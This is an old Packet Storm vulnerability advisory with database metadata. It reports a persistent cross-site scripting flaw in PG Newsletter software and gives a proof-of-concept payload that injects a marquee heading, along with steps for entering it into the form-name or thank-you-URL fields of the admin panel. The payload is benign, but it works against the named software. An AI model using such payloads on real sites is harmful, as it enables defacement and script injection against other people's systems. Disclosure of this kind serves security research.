ID PACKETSTORM:103002
Type packetstorm
Reporter r007k17-w
Modified 2011-07-13T00:00:00
Description
` %+
$.......#........4.........|).......0............\/\/ %+
%+
%+
%++++++++++++++++++++++++++++++++++++++++
# Exploit Title: PG Newsletter persistent XSS vulnerability
# Vendor: demo.newsletter.pro
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# My Blog: http://www.shadowrootkit.wordpress.com
# Google Dork: © 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered
by PG Newsletter Software <http://www.newsletter.pro/> - email marketing
software
****************************************************************************************************************************************************************************************
Persistent XSS Vulnerability
********************************
{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit
EXPLOIT: ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
Observe: login to the admin panel(demo).Inject this script in a create form
page, i.e, (DEMO) in formname field or thankyoupageURL field
Now observe: demo.newsletter.pro/forms/index.php
*****************************************************************************************************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************
`
{"reporter": "r007k17-w", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:26:51"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:51"}, "vulnersScore": -0.4}, "published": "2011-07-13T00:00:00", "cvelist": [], "lastseen": "2016-11-03T10:26:51", "history": [], "id": "PACKETSTORM:103002", "sourceHref": "https://packetstormsecurity.com/files/download/103002/pgnewsletter-xss.txt", "objectVersion": "1.2", "sourceData": "` %+ \n$.......#........4.........|).......0............\\/\\/ %+ \n \n \n%+ \n%+ \n \n \n%++++++++++++++++++++++++++++++++++++++++ \n \n \n# Exploit Title: PG Newsletter persistent XSS vulnerability \n# Vendor: demo.newsletter.pro \n# Author: $#4d0\\/\\/[r007k17] a.k.a Raghavendra Karthik D \n# My Blog: http://www.shadowrootkit.wordpress.com \n# Google Dork: \u00a9 2010 PilotGroup.NET <http://www.pilotgroup.net/> Powered \nby PG Newsletter Software <http://www.newsletter.pro/> - email marketing \nsoftware \n \n**************************************************************************************************************************************************************************************** \nPersistent XSS Vulnerability \n******************************** \n{DEMO} : demo.newsletter.pro/forms/index.php?sel=edit \nEXPLOIT: \">><marquee><h1>XSSed_by_r007k17</h1></marquee> \n \nObserve: login to the admin panel(demo).Inject this script in a create form \npage, i.e, (DEMO) in formname field or thankyoupageURL field \nNow observe: demo.newsletter.pro/forms/index.php \n \n***************************************************************************************************************************************************************************************** \nsp3c14l Thanks to s1d3 effects and my friends@!3.14-- \n***************************************************************************************************************************************************************************************** \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "description": "", "references": [], "edition": 1, "title": "PG Newsletter Cross Site Scripting", "type": "packetstorm", "modified": "2011-07-13T00:00:00", "hash": "58ba8283f65d65a3cf2bc4012143940ddd67fa00b1ae5ae9855b86090988aae4", "bulletinFamily": "exploit", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "0d545bdc5ecc7230c4cdb928aa6fd010", "key": "href"}, {"hash": "b8211bd77f0a5201ec7893adb3722f3e", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "b8211bd77f0a5201ec7893adb3722f3e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9e5ecf30eafba07689a5ec6b3e130bf8", "key": "reporter"}, {"hash": "37f015e6058d0b8cfd038482f38e7a2e", "key": "sourceData"}, {"hash": "f7a4b983aa4b33831d44e6c71977d375", "key": "sourceHref"}, {"hash": "ecdfe89f0b6581cd6d2fd42abeff78f0", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "href": "https://packetstormsecurity.com/files/103002/PG-Newsletter-Cross-Site-Scripting.html", "viewCount": 0}
{}